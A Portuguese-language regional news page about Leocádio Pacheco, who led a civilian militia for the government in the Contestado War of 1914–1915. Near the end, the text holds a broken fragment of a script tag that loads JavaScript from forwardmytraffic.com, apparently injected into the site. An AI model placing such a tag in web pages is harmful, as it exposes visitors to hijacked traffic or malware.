InícioCuriosidades do PassadoTresbarrense, morto no combate de Santa Maria, lutou ao lado das forças...

Tresbarrense, morto no combate de Santa Maria, lutou ao lado das forças do governo na Guerra do Contestado.

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

A memória familiar, somada as fontes documentais, revelam a participação de Leocádio Pacheco na Guerra do Contestado, lutando ao lado das forças do governo.  O Exército acantonado em Canoinhas, desconhecia o interior da região. Eles contaram com o apoio dos vaqueanos, grupos armados, chamados de “piquete civil”, contratados pelos grandes proprietários da região. Luis Cesar Pacheco, relata sobre a atuação do avô.

Leocádio Pacheco na Guerra do Contestado

Cerca de mil vaqueanos atuaram nos anos de 1914 e 1915. Eles acompanhavam as tropas legais nos ataques aos redutos e na captura de sertanejos entocados nas densas florestas.  Coronel Fabricio Vieira e Pedro Leão de Carvalho (Pedro Ruivo) são nomes conhecidos na historiografia. Leocádio Pacheco, nome que merece maiores estudos, tem registros do seu piquete de vaqueanos no Arquivo Histórico do Exército (Rio de Janeiro).

Documentação de Leocádio Pacheco

Podemos analisar a atuação dos vaqueanos em dois horizontes, sob ponto de vista dos aliados às forças do governo, como de grande ajuda em defesa à causa nacional. Em contrapartida, como ponto negativo, alguns vaqueanos eram sujeitos a feitos de violência e quando incorporados aos piquetes, apresentaram em seus currículos inúmeras atrocidades.

Chama atenção o nome dos civis contratados como vaqueanos, (final do segundo vídeo) muitos deles, conhecidos. Se você é descendente de algum deles, poderá contribuir com a História. Entre em contato: (47) 997873819

soelihistó[email protected]

https://www.facebook.com/Soelicontestado

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.